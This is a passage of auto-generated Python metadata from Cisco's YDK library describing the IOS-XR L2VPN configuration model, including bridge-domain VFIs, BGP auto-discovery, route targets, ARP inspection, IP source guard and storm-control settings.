),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable BGP as Signaling Protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ve-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Virtual Edge Block Configurable
Range
''',
've_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('veid', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Virtual Edge Identifier
''',
'veid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
False,
[
_MetaInfoClassMember('route-target', REFERENCE_LIST, 'RouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
[], [],
''' Name of the Route Target
''',
'route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
False,
[
_MetaInfoClassMember('ad-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable control-word for this VFI
''',
'ad_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-route-policy', REFERENCE_CLASS, 'BgpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
[], [],
''' Route policy
''',
'bgp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-signaling-protocol', REFERENCE_CLASS, 'BgpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
[], [],
''' Enable Signaling Protocol BGP in this
VFI
''',
'bgp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ldp-signaling-protocol', REFERENCE_CLASS, 'LdpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
[], [],
''' Signaling Protocol LDP in this VFI
configuration
''',
'ldp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-targets', REFERENCE_CLASS, 'RouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
[], [],
''' Route Target
''',
'route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of
forwarding data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Virtual Forwarding Interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bgp-auto-discovery', REFERENCE_CLASS, 'BgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in this VFI
''',
'bgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multicast-p2mp', REFERENCE_CLASS, 'MulticastP2Mp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
[], [],
''' Enable Multicast P2MP in this VFI
''',
'multicast_p2mp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pseudowires', REFERENCE_CLASS, 'VfiPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
[], [],
''' List of pseudowires
''',
'vfi_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling Shutdown
''',
'vfi_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vpnid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'vpnid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
False,
[
_MetaInfoClassMember('vfi', REFERENCE_LIST, 'Vfi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
[], [],
''' Name of the Virtual Forwarding Interface
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic IP source
guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic ARP
Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2 Interface Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai-address-validation', REFERENCE_CLASS, 'InterfaceDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
[], [],
''' Address Validation
''',
'interface_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
False,
[
_MetaInfoClassMember('bdac-storm-control-type', REFERENCE_LIST, 'BdacStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
[], [],
''' Storm Control Type
''',
'bdac_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon-group-id',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
False,
[
_MetaInfoClassMember('split-horizon-group-id', REFERENCE_CLASS, 'SplitHorizonGroupId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
[], [],
''' Split Horizon Group ID
''',
'split_horizon_group_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses' : {
